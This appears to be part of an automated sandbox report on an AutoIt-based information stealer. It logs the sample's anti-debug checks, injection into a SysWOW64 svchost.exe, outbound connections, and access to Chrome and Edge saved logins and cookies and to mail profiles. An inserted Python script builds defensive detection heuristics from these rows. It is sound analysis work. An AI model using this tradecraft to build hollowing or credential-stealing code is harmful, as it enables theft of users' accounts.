                  Source: C:\Users\user\Desktop\B7N48hmO78.exeAPI call chain: ExitProcess graph end nodegraph_0-93917
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A9578 LdrInitializeThunk,3_2_081A9578
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E36AAF BlockInput,0_2_00E36AAF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DE3D19
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E13920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00E13920
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00F02F90 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F02F90
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BA100 mov eax, dword ptr fs:[00000030h]0_2_010BA100
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BB750 mov eax, dword ptr fs:[00000030h]0_2_010BB750
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BB7B0 mov eax, dword ptr fs:[00000030h]0_2_010BB7B0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133B0C8 mov eax, dword ptr fs:[00000030h]2_2_0133B0C8
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133C718 mov eax, dword ptr fs:[00000030h]2_2_0133C718
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133C778 mov eax, dword ptr fs:[00000030h]2_2_0133C778
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E1A66C
                  Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E081AC
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E08189 SetUnhandledExceptionFilter,0_2_00E08189
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D48189 SetUnhandledExceptionFilter,2_2_00D48189
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D481AC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.21.32.1 443
                  Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 149.154.167.220 443
                  Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 132.226.247.73 80
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A76008
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E1B106 LogonUserW
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00DE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E2411C SendInput,keybd_event
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E274E7 mouse_event
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\B7N48hmO78.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\inhumate\demonetised.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                  Source: B7N48hmO78.exe, demonetised.exe | Binary or memory string: Shell_TrayWnd
                  Source: B7N48hmO78.exe, 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, demonetised.exe, 00000002.00000002.2088550443.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp, demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E065C4 cpuid
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA, 3_2_00417A20
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E3091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E5B340 GetUserNameW
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E11E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00DFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: B7N48hmO78.exe, 00000000.00000003.2051684054.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000002.2070941753.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2058142172.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2058444304.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2057687916.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, B7N48hmO78.exe, 00000000.00000003.2048784248.00000000010AC000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2066443218.000000000136E000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2078673295.000000000134E000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000002.2089593624.000000000136E000.00000004.00000020.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2066320567.000000000136E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: msmpeng.exe
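The "Process created", "Memory written" and "Network Connect" rows in this section describe the hollowing chain the sample uses: wscript.exe starts demonetised.exe out of %LOCALAPPDATA%, demonetised.exe starts the 32-bit C:\Windows\SysWOW64\svchost.exe with a command line that is the dropper's own path instead of the usual "-k <group>" argument, writes into that process, and the hollowed svchost.exe is then the one that talks to the remote addresses. The Python below is an added example of how an analyst could turn those observations into host-telemetry rules; it is not Joe Sandbox code and not code from the sample. The event dictionaries, their field names, the benign services.exe control row and the DISPATCH layout are constructed for the example.

```python
"""Added example (not Joe Sandbox or sample code): heuristic host-telemetry rules
for the svchost.exe hollowing chain observed in this report."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]

SERVICES_EXE = r"c:\windows\system32\services.exe"   # the legitimate parent of svchost.exe
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SVCHOST_ARGS = re.compile(r"(^|\s)-k\s+\S+")          # services.exe normally passes -k <group>

# Constructed sample events mirroring the report's rows; field names are an assumption.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process_create", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\user\AppData\Local\inhumate\demonetised.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\inhumate\demonetised.exe"'},
    {"type": "process_create", "parent": r"C:\Users\user\AppData\Local\inhumate\demonetised.exe",
     "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\inhumate\demonetised.exe"'},
    {"type": "process_create", "parent": r"C:\Windows\System32\services.exe",   # benign control row
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"type": "memory_write", "source": r"C:\Users\user\AppData\Local\inhumate\demonetised.exe",
     "target": r"C:\Windows\SysWOW64\svchost.exe", "base": 0x2CD7008},
    {"type": "network_connect", "image": r"C:\Windows\SysWOW64\svchost.exe",
     "dst": "149.154.167.220", "port": 443},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _under_windows(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")


def check_process_create(ev: Event) -> List[str]:
    """Flag svchost.exe with the wrong parent, without -k, or the SysWOW64 copy,
    and a script host launching an executable out of a user profile."""
    findings: List[str] = []
    image, parent, cmdline = str(ev["image"]), str(ev["parent"]), str(ev["cmdline"])
    if _basename(image) == "svchost.exe":
        if parent.lower() != SERVICES_EXE:
            findings.append(f"svchost.exe spawned by non-services parent {parent}")
        if not SVCHOST_ARGS.search(cmdline):
            findings.append("svchost.exe command line lacks '-k <group>' (hollowed host?)")
        if "\\syswow64\\" in image.lower():
            findings.append("32-bit (SysWOW64) svchost.exe started")
    if _basename(parent) in SCRIPT_HOSTS and "\\appdata\\" in image.lower():
        findings.append(f"{_basename(parent)} launched an executable from AppData: {image}")
    return findings


def check_memory_write(ev: Event) -> List[str]:
    """A process outside C:\\Windows writing into svchost.exe is injection, not servicing."""
    if _basename(str(ev["target"])) == "svchost.exe" and not _under_windows(str(ev["source"])):
        return [f"{ev['source']} wrote into svchost.exe at {int(ev['base']):#x}"]
    return []


def check_network_connect(ev: Event) -> List[str]:
    """On 64-bit Windows the service host is the System32 copy; a SysWOW64
    svchost.exe with outbound traffic deserves a look."""
    if str(ev["image"]).lower().endswith("\\syswow64\\svchost.exe"):
        return [f"SysWOW64 svchost.exe connected to {ev['dst']}:{ev['port']}"]
    return []


DISPATCH: Dict[str, Callable[[Event], List[str]]] = {
    "process_create": check_process_create,
    "memory_write": check_memory_write,
    "network_connect": check_network_connect,
}


def evaluate(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, finding) pairs; an empty list means nothing matched."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        check = DISPATCH.get(str(ev["type"]))
        for finding in (check(ev) if check else []):
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, finding in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Run against the constructed events, every row taken from the report fires (the wscript.exe launch, the svchost.exe creation on three separate rules, the memory write and the outbound connection) while the services.exe control row stays quiet. Each rule alone is a heuristic; the chain of all of them from one parent is what distinguishes this sample from an odd but benign service host.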

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
                  Source: Yara match | File source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: demonetised.exe | Binary or memory string: WIN_81
                  Source: demonetised.exe | Binary or memory string: WIN_XP
                  Source: demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                  Source: demonetised.exe | Binary or memory string: WIN_XPe
                  Source: demonetised.exe | Binary or memory string: WIN_VISTA
                  Source: demonetised.exe | Binary or memory string: WIN_7
                  Source: demonetised.exe | Binary or memory string: WIN_8
                  Source: Yara match | File source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
